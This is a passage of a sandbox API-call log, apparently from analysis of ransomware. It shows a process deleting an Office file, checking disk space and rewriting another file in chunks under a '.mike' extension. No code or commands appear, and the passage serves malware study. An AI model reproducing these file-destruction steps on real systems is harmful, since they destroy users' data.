(dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZLIB.ACCDE", dwFileAttributes=0x80) returned 1 [0071.941] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzlib.accde")) returned 1 [0071.943] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0072.166] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.166] SetFilePointer (in: hFile=0x288, lDistanceToMove=1710080, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1a1800 [0072.168] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.168] SetFilePointer (in: hFile=0x288, lDistanceToMove=1720320, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1a4000 [0072.169] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.170] SetFilePointer (in: hFile=0x288, lDistanceToMove=1730560, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1a6800 [0072.171] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.171] SetFilePointer (in: hFile=0x288, lDistanceToMove=1740800, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1a9000 [0072.173] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.173] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE", lpFilePart=0x0) returned 0x40 [0072.173] SetFilePointer (in: hFile=0x288, lDistanceToMove=1751040, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1ab800 [0072.175] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.175] SetFilePointer (in: hFile=0x288, lDistanceToMove=1761280, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1ae000 [0072.176] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.177] SetFilePointer (in: hFile=0x288, lDistanceToMove=1771520, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b0800 [0072.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.178] SetFilePointer (in: hFile=0x288, lDistanceToMove=1781760, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b3000 [0072.180] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.180] SetFilePointer (in: hFile=0x288, lDistanceToMove=1792000, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b5800 [0072.181] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.182] SetFilePointer (in: hFile=0x288, lDistanceToMove=1802240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b8000 [0072.183] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.183] SetFilePointer (in: hFile=0x288, lDistanceToMove=1812480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1ba800 [0072.184] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.185] SetFilePointer (in: hFile=0x288, lDistanceToMove=1822720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1bd000 [0072.186] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.187] SetFilePointer (in: hFile=0x288, lDistanceToMove=1832960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1bf800 [0072.190] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.191] SetFilePointer (in: hFile=0x288, lDistanceToMove=1843200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1c2000 [0072.192] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.193] SetFilePointer (in: hFile=0x288, lDistanceToMove=1853440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1c4800 [0072.194] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.194] SetFilePointer (in: hFile=0x288, lDistanceToMove=1863680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1c7000 [0072.196] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.196] SetFilePointer (in: hFile=0x288, lDistanceToMove=1873920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1c9800 [0072.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.198] SetFilePointer (in: hFile=0x288, lDistanceToMove=1884160, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1cc000 [0072.199] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.200] SetFilePointer (in: hFile=0x288, lDistanceToMove=1894400, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1ce800 [0072.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.201] SetFilePointer (in: hFile=0x288, lDistanceToMove=1904640, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1d1000 [0072.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.203] SetFilePointer (in: hFile=0x288, lDistanceToMove=1914880, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1d3800 [0072.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.205] SetFilePointer (in: hFile=0x288, lDistanceToMove=1925120, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1d6000 [0072.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.206] SetFilePointer (in: hFile=0x288, lDistanceToMove=1935360, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1d8800 [0072.207] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.208] SetFilePointer (in: hFile=0x288, lDistanceToMove=1945600, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1db000 [0072.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft 